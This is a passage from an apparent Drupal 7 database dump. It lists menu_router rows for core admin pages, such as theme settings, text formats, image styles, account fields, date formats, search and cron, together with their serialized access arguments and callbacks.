(inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:5:\"seven\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Seven','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/settings/stark','','','_system_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','drupal_get_form','a:2:{i:0;s:21:\"system_theme_settings\";i:1;s:5:\"stark\";}','',15,4,1,'admin/appearance/settings','admin/appearance','Stark','t','','','a:0:{}',132,'','',0,'modules/system/system.admin.inc'),('admin/appearance/update','','','update_manager_access','a:0:{}','drupal_get_form','a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:5:\"theme\";}','',7,3,1,'admin/appearance','admin/appearance','Update','t','','','a:0:{}',132,'','',10,'modules/update/update.manager.inc'),('admin/compact','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_compact_page','a:0:{}','',3,2,0,'','admin/compact','Compact mode','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/config','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_config_page','a:0:{}','',3,2,0,'','admin/config','Configuration','t','','','a:0:{}',6,'Administer settings.','',0,'modules/system/system.admin.inc'),('admin/config/content','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/content','Content authoring','t','','','a:0:{}',6,'Settings related to formatting and authoring content.','left',-15,'modules/system/system.admin.inc'),('admin/config/content/formats','','','user_access','a:1:{i:0;s:18:\"administer filters\";}','drupal_get_form','a:1:{i:0;s:21:\"filter_admin_overview\";}','',15,4,0,'','admin/config/content/formats','Text formats','t','','','a:0:{}',6,'Configure how content input by users is filtered, including allowed HTML tags. Also allows enabling of module-provided filters.','',0,'modules/filter/filter.admin.inc'),('admin/config/content/formats/%','a:1:{i:4;s:18:\"filter_format_load\";}','','user_access','a:1:{i:0;s:18:\"administer filters\";}','filter_admin_format_page','a:1:{i:0;i:4;}','',30,5,0,'','admin/config/content/formats/%','','filter_admin_format_title','a:1:{i:0;i:4;}','','a:0:{}',6,'','',0,'modules/filter/filter.admin.inc'),('admin/config/content/formats/%/disable','a:1:{i:4;s:18:\"filter_format_load\";}','','_filter_disable_format_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:20:\"filter_admin_disable\";i:1;i:4;}','',61,6,0,'','admin/config/content/formats/%/disable','Disable text format','t','','','a:0:{}',6,'','',0,'modules/filter/filter.admin.inc'),('admin/config/content/formats/add','','','user_access','a:1:{i:0;s:18:\"administer filters\";}','filter_admin_format_page','a:0:{}','',31,5,1,'admin/config/content/formats','admin/config/content/formats','Add text format','t','','','a:0:{}',388,'','',1,'modules/filter/filter.admin.inc'),('admin/config/content/formats/list','','','user_access','a:1:{i:0;s:18:\"administer filters\";}','drupal_get_form','a:1:{i:0;s:21:\"filter_admin_overview\";}','',31,5,1,'admin/config/content/formats','admin/config/content/formats','List','t','','','a:0:{}',140,'','',0,'modules/filter/filter.admin.inc'),('admin/config/development','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/development','Development','t','','','a:0:{}',6,'Development tools.','right',-10,'modules/system/system.admin.inc'),('admin/config/development/logging','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:23:\"system_logging_settings\";}','',15,4,0,'','admin/config/development/logging','Logging and errors','t','','','a:0:{}',6,'Settings for logging and alerts modules. Various modules can route Drupal\'s system events to different destinations, such as syslog, database, email, etc.','',-15,'modules/system/system.admin.inc'),('admin/config/development/maintenance','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:28:\"system_site_maintenance_mode\";}','',15,4,0,'','admin/config/development/maintenance','Maintenance mode','t','','','a:0:{}',6,'Take the site offline for maintenance or bring it back online.','',-10,'modules/system/system.admin.inc'),('admin/config/development/performance','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:27:\"system_performance_settings\";}','',15,4,0,'','admin/config/development/performance','Performance','t','','','a:0:{}',6,'Enable or disable page caching for anonymous users and set CSS and JS bandwidth optimization options.','',-20,'modules/system/system.admin.inc'),('admin/config/media','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/media','Media','t','','','a:0:{}',6,'Media tools.','left',-10,'modules/system/system.admin.inc'),('admin/config/media/file-system','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:27:\"system_file_system_settings\";}','',15,4,0,'','admin/config/media/file-system','File system','t','','','a:0:{}',6,'Tell Drupal where to store uploaded files and how they are accessed.','',-10,'modules/system/system.admin.inc'),('admin/config/media/image-styles','','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','image_style_list','a:0:{}','',15,4,0,'','admin/config/media/image-styles','Image styles','t','','','a:0:{}',6,'Configure styles that can be used for resizing or adjusting images on display.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/add','','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:1:{i:0;s:20:\"image_style_add_form\";}','',31,5,1,'admin/config/media/image-styles','admin/config/media/image-styles','Add style','t','','','a:0:{}',388,'Add a new image style.','',2,'modules/image/image.admin.inc'),('admin/config/media/image-styles/delete/%','a:1:{i:5;a:1:{s:16:\"image_style_load\";a:2:{i:0;N;i:1;s:1:\"1\";}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:2:{i:0;s:23:\"image_style_delete_form\";i:1;i:5;}','',62,6,0,'','admin/config/media/image-styles/delete/%','Delete style','t','','','a:0:{}',6,'Delete an image style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/edit/%','a:1:{i:5;s:16:\"image_style_load\";}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:2:{i:0;s:16:\"image_style_form\";i:1;i:5;}','',62,6,0,'','admin/config/media/image-styles/edit/%','Edit style','t','','','a:0:{}',6,'Configure an image style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/edit/%/add/%','a:2:{i:5;a:1:{s:16:\"image_style_load\";a:1:{i:0;i:5;}}i:7;a:1:{s:28:\"image_effect_definition_load\";a:1:{i:0;i:5;}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:3:{i:0;s:17:\"image_effect_form\";i:1;i:5;i:2;i:7;}','',250,8,0,'','admin/config/media/image-styles/edit/%/add/%','Add image effect','t','','','a:0:{}',6,'Add a new effect to a style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/edit/%/effects/%','a:2:{i:5;a:1:{s:16:\"image_style_load\";a:2:{i:0;i:5;i:1;s:1:\"3\";}}i:7;a:1:{s:17:\"image_effect_load\";a:2:{i:0;i:5;i:1;s:1:\"3\";}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:3:{i:0;s:17:\"image_effect_form\";i:1;i:5;i:2;i:7;}','',250,8,0,'','admin/config/media/image-styles/edit/%/effects/%','Edit image effect','t','','','a:0:{}',6,'Edit an existing effect within a style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/edit/%/effects/%/delete','a:2:{i:5;a:1:{s:16:\"image_style_load\";a:2:{i:0;i:5;i:1;s:1:\"3\";}}i:7;a:1:{s:17:\"image_effect_load\";a:2:{i:0;i:5;i:1;s:1:\"3\";}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:3:{i:0;s:24:\"image_effect_delete_form\";i:1;i:5;i:2;i:7;}','',501,9,0,'','admin/config/media/image-styles/edit/%/effects/%/delete','Delete image effect','t','','','a:0:{}',6,'Delete an existing effect from a style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-styles/list','','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','image_style_list','a:0:{}','',31,5,1,'admin/config/media/image-styles','admin/config/media/image-styles','List','t','','','a:0:{}',140,'List the current image styles on the site.','',1,'modules/image/image.admin.inc'),('admin/config/media/image-styles/revert/%','a:1:{i:5;a:1:{s:16:\"image_style_load\";a:2:{i:0;N;i:1;s:1:\"2\";}}}','','user_access','a:1:{i:0;s:23:\"administer image styles\";}','drupal_get_form','a:2:{i:0;s:23:\"image_style_revert_form\";i:1;i:5;}','',62,6,0,'','admin/config/media/image-styles/revert/%','Revert style','t','','','a:0:{}',6,'Revert an image style.','',0,'modules/image/image.admin.inc'),('admin/config/media/image-toolkit','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:29:\"system_image_toolkit_settings\";}','',15,4,0,'','admin/config/media/image-toolkit','Image toolkit','t','','','a:0:{}',6,'Choose which image toolkit to use if you have installed optional toolkits.','',20,'modules/system/system.admin.inc'),('admin/config/people','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/people','People','t','','','a:0:{}',6,'Configure user accounts.','left',-20,'modules/system/system.admin.inc'),('admin/config/people/accounts','','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:1:{i:0;s:19:\"user_admin_settings\";}','',15,4,0,'','admin/config/people/accounts','Account settings','t','','','a:0:{}',6,'Configure default behavior of users, including registration requirements, e-mails, fields, and user pictures.','',-10,'modules/user/user.admin.inc'),('admin/config/people/accounts/display','','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:7:\"default\";}','',31,5,1,'admin/config/people/accounts','admin/config/people/accounts','Manage display','t','','','a:0:{}',132,'','',2,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/display/default','','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:7:\"default\";i:3;s:11:\"user_access\";i:4;s:16:\"administer users\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:7:\"default\";}','',63,6,1,'admin/config/people/accounts/display','admin/config/people/accounts','Default','t','','','a:0:{}',140,'','',-10,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/display/full','','','_field_ui_view_mode_menu_access','a:5:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:4:\"full\";i:3;s:11:\"user_access\";i:4;s:16:\"administer users\";}','drupal_get_form','a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:4:\"full\";}','',63,6,1,'admin/config/people/accounts/display','admin/config/people/accounts','User account','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields','','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";}','',31,5,1,'admin/config/people/accounts','admin/config/people/accounts','Manage fields','t','','','a:0:{}',132,'','',1,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:5;}','',62,6,0,'','admin/config/people/accounts/fields/%','','field_ui_menu_title','a:1:{i:0;i:5;}','','a:0:{}',6,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%/delete','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:26:\"field_ui_field_delete_form\";i:1;i:5;}','',125,7,1,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','Delete','t','','','a:0:{}',132,'','',10,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%/edit','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:24:\"field_ui_field_edit_form\";i:1;i:5;}','',125,7,1,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','Edit','t','','','a:0:{}',140,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%/field-settings','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:28:\"field_ui_field_settings_form\";i:1;i:5;}','',125,7,1,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','Field settings','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/fields/%/widget-type','a:1:{i:5;a:1:{s:18:\"field_ui_menu_load\";a:4:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:1:\"0\";i:3;s:4:\"%map\";}}}','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:2:{i:0;s:25:\"field_ui_widget_type_form\";i:1;i:5;}','',125,7,1,'admin/config/people/accounts/fields/%','admin/config/people/accounts/fields/%','Widget type','t','','','a:0:{}',132,'','',0,'modules/field_ui/field_ui.admin.inc'),('admin/config/people/accounts/settings','','','user_access','a:1:{i:0;s:16:\"administer users\";}','drupal_get_form','a:1:{i:0;s:19:\"user_admin_settings\";}','',31,5,1,'admin/config/people/accounts','admin/config/people/accounts','Settings','t','','','a:0:{}',140,'','',-10,'modules/user/user.admin.inc'),('admin/config/people/ip-blocking','','','user_access','a:1:{i:0;s:18:\"block IP addresses\";}','system_ip_blocking','a:0:{}','',15,4,0,'','admin/config/people/ip-blocking','IP address blocking','t','','','a:0:{}',6,'Manage blocked IP addresses.','',10,'modules/system/system.admin.inc'),('admin/config/people/ip-blocking/delete/%','a:1:{i:5;s:15:\"blocked_ip_load\";}','','user_access','a:1:{i:0;s:18:\"block IP addresses\";}','drupal_get_form','a:2:{i:0;s:25:\"system_ip_blocking_delete\";i:1;i:5;}','',62,6,0,'','admin/config/people/ip-blocking/delete/%','Delete IP address','t','','','a:0:{}',6,'','',0,'modules/system/system.admin.inc'),('admin/config/regional','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/regional','Regional and language','t','','','a:0:{}',6,'Regional settings, localization and translation.','left',-5,'modules/system/system.admin.inc'),('admin/config/regional/date-time','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:25:\"system_date_time_settings\";}','',15,4,0,'','admin/config/regional/date-time','Date and time','t','','','a:0:{}',6,'Configure display formats for date and time.','',-15,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_date_time_formats','a:0:{}','',31,5,1,'admin/config/regional/date-time','admin/config/regional/date-time','Formats','t','','','a:0:{}',132,'Configure display format strings for date and time.','',-9,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats/%/delete','a:1:{i:5;N;}','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:2:{i:0;s:30:\"system_date_delete_format_form\";i:1;i:5;}','',125,7,0,'','admin/config/regional/date-time/formats/%/delete','Delete date format','t','','','a:0:{}',6,'Allow users to delete a configured date format.','',0,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats/%/edit','a:1:{i:5;N;}','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:2:{i:0;s:34:\"system_configure_date_formats_form\";i:1;i:5;}','',125,7,0,'','admin/config/regional/date-time/formats/%/edit','Edit date format','t','','','a:0:{}',6,'Allow users to edit a configured date format.','',0,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats/add','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:34:\"system_configure_date_formats_form\";}','',63,6,1,'admin/config/regional/date-time/formats','admin/config/regional/date-time','Add format','t','','','a:0:{}',388,'Allow users to add additional date formats.','',-10,'modules/system/system.admin.inc'),('admin/config/regional/date-time/formats/lookup','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','system_date_time_lookup','a:0:{}','',63,6,0,'','admin/config/regional/date-time/formats/lookup','Date and time lookup','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/config/regional/date-time/types','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:25:\"system_date_time_settings\";}','',31,5,1,'admin/config/regional/date-time','admin/config/regional/date-time','Types','t','','','a:0:{}',140,'Configure display formats for date and time.','',-10,'modules/system/system.admin.inc'),('admin/config/regional/date-time/types/%/delete','a:1:{i:5;N;}','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:2:{i:0;s:35:\"system_delete_date_format_type_form\";i:1;i:5;}','',125,7,0,'','admin/config/regional/date-time/types/%/delete','Delete date type','t','','','a:0:{}',6,'Allow users to delete a configured date type.','',0,'modules/system/system.admin.inc'),('admin/config/regional/date-time/types/add','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:32:\"system_add_date_format_type_form\";}','',63,6,1,'admin/config/regional/date-time/types','admin/config/regional/date-time','Add date type','t','','','a:0:{}',388,'Add new date type.','',-10,'modules/system/system.admin.inc'),('admin/config/regional/settings','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:24:\"system_regional_settings\";}','',15,4,0,'','admin/config/regional/settings','Regional settings','t','','','a:0:{}',6,'Settings for the site\'s default time zone and country.','',-20,'modules/system/system.admin.inc'),('admin/config/search','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/search','Search and metadata','t','','','a:0:{}',6,'Local site search, metadata and SEO.','left',-10,'modules/system/system.admin.inc'),('admin/config/search/clean-urls','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:25:\"system_clean_url_settings\";}','',15,4,0,'','admin/config/search/clean-urls','Clean URLs','t','','','a:0:{}',6,'Enable or disable clean URLs for your site.','',5,'modules/system/system.admin.inc'),('admin/config/search/clean-urls/check','','','1','a:0:{}','drupal_json_output','a:1:{i:0;a:1:{s:6:\"status\";b:1;}}','',31,5,0,'','admin/config/search/clean-urls/check','Clean URL check','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/config/search/path','','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','path_admin_overview','a:0:{}','',15,4,0,'','admin/config/search/path','URL aliases','t','','','a:0:{}',6,'Change your site\'s URL paths by aliasing them.','',-5,'modules/path/path.admin.inc'),('admin/config/search/path/add','','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','path_admin_edit','a:0:{}','',31,5,1,'admin/config/search/path','admin/config/search/path','Add alias','t','','','a:0:{}',388,'','',0,'modules/path/path.admin.inc'),('admin/config/search/path/delete/%','a:1:{i:5;s:9:\"path_load\";}','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','drupal_get_form','a:2:{i:0;s:25:\"path_admin_delete_confirm\";i:1;i:5;}','',62,6,0,'','admin/config/search/path/delete/%','Delete alias','t','','','a:0:{}',6,'','',0,'modules/path/path.admin.inc'),('admin/config/search/path/edit/%','a:1:{i:5;s:9:\"path_load\";}','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','path_admin_edit','a:1:{i:0;i:5;}','',62,6,0,'','admin/config/search/path/edit/%','Edit alias','t','','','a:0:{}',6,'','',0,'modules/path/path.admin.inc'),('admin/config/search/path/list','','','user_access','a:1:{i:0;s:22:\"administer url aliases\";}','path_admin_overview','a:0:{}','',31,5,1,'admin/config/search/path','admin/config/search/path','List','t','','','a:0:{}',140,'','',-10,'modules/path/path.admin.inc'),('admin/config/search/settings','','','user_access','a:1:{i:0;s:17:\"administer search\";}','drupal_get_form','a:1:{i:0;s:21:\"search_admin_settings\";}','',15,4,0,'','admin/config/search/settings','Search settings','t','','','a:0:{}',6,'Configure relevance settings for search and other indexing options.','',-10,'modules/search/search.admin.inc'),('admin/config/search/settings/reindex','','','user_access','a:1:{i:0;s:17:\"administer search\";}','drupal_get_form','a:1:{i:0;s:22:\"search_reindex_confirm\";}','',31,5,0,'','admin/config/search/settings/reindex','Clear index','t','','','a:0:{}',4,'','',0,'modules/search/search.admin.inc'),('admin/config/services','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/services','Web services','t','','','a:0:{}',6,'Tools related to web services.','right',0,'modules/system/system.admin.inc'),('admin/config/services/rss-publishing','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:25:\"system_rss_feeds_settings\";}','',15,4,0,'','admin/config/services/rss-publishing','RSS publishing','t','','','a:0:{}',6,'Configure the site description, the number of items per feed and whether feeds should be titles/teasers/full-text.','',0,'modules/system/system.admin.inc'),('admin/config/system','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/system','System','t','','','a:0:{}',6,'General system related configuration.','right',-20,'modules/system/system.admin.inc'),('admin/config/system/actions','','','user_access','a:1:{i:0;s:18:\"administer actions\";}','system_actions_manage','a:0:{}','',15,4,0,'','admin/config/system/actions','Actions','t','','','a:0:{}',6,'Manage the actions defined for your site.','',0,'modules/system/system.admin.inc'),('admin/config/system/actions/configure','','','user_access','a:1:{i:0;s:18:\"administer actions\";}','drupal_get_form','a:1:{i:0;s:24:\"system_actions_configure\";}','',31,5,0,'','admin/config/system/actions/configure','Configure an advanced action','t','','','a:0:{}',4,'','',0,'modules/system/system.admin.inc'),('admin/config/system/actions/delete/%','a:1:{i:5;s:12:\"actions_load\";}','','user_access','a:1:{i:0;s:18:\"administer actions\";}','drupal_get_form','a:2:{i:0;s:26:\"system_actions_delete_form\";i:1;i:5;}','',62,6,0,'','admin/config/system/actions/delete/%','Delete action','t','','','a:0:{}',6,'Delete an action.','',0,'modules/system/system.admin.inc'),('admin/config/system/actions/manage','','','user_access','a:1:{i:0;s:18:\"administer actions\";}','system_actions_manage','a:0:{}','',31,5,1,'admin/config/system/actions','admin/config/system/actions','Manage actions','t','','','a:0:{}',140,'Manage the actions defined for your site.','',-2,'modules/system/system.admin.inc'),('admin/config/system/actions/orphan','','','user_access','a:1:{i:0;s:18:\"administer actions\";}','system_actions_remove_orphans','a:0:{}','',31,5,0,'','admin/config/system/actions/orphan','Remove orphans','t','','','a:0:{}',0,'','',0,'modules/system/system.admin.inc'),('admin/config/system/cron','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:20:\"system_cron_settings\";}','',15,4,0,'','admin/config/system/cron','Cron','t','','','a:0:{}',6,'Manage automatic site maintenance tasks.','',20,'modules/system/system.admin.inc'),('admin/config/system/site-information','','','user_access','a:1:{i:0;s:29:\"administer site configuration\";}','drupal_get_form','a:1:{i:0;s:32:\"system_site_information_settings\";}','',15,4,0,'','admin/config/system/site-information','Site information','t','','','a:0:{}',6,'Change site name, e-mail address, slogan, default front page, and number of posts per page, error pages.','',-20,'modules/system/system.admin.inc'),('admin/config/system/statistics','','','user_access','a:1:{i:0;s:21:\"administer statistics\";}','drupal_get_form','a:1:{i:0;s:24:\"statistics_settings_form\";}','',15,4,0,'','admin/config/system/statistics','Statistics','t','','','a:0:{}',6,'Control details about what and how your site logs access statistics.','',-15,'modules/statistics/statistics.admin.inc'),('admin/config/user-interface','','','user_access','a:1:{i:0;s:27:\"access administration pages\";}','system_admin_menu_block_page','a:0:{}','',7,3,0,'','admin/config/user-interface','User interface','t','','','a:0:{}',6,'Tools that enhance the user interface.','right',-15,'modules/system/system.admin.inc'),('admin/config/user-interface/shortcut','','','user_access','a:1:{i:0;s:20:\"administer shortcuts\";}','shortcut_set_admin','a:0:{}','',15,4,0,'','admin/config/user-interface/shortcut','Shortcuts','t','','','a:0:{}',6,'Add and modify shortcut sets.','',0,'modules/shortcut/shortcut.admin.inc'),('admin/config/user-interface/shortcut/%','a:1:{i:4;s:17:\"shortcut_set_load\";}','','shortcut_set_edit_access','a:1:{i:0;i:4;}','drupal_get_form','a:2:{i:0;s:22:\"shortcut_set_customize\";i:1;i:4;}','',30,5,0,'','admin/config/user-interface/shortcut/%','Edit 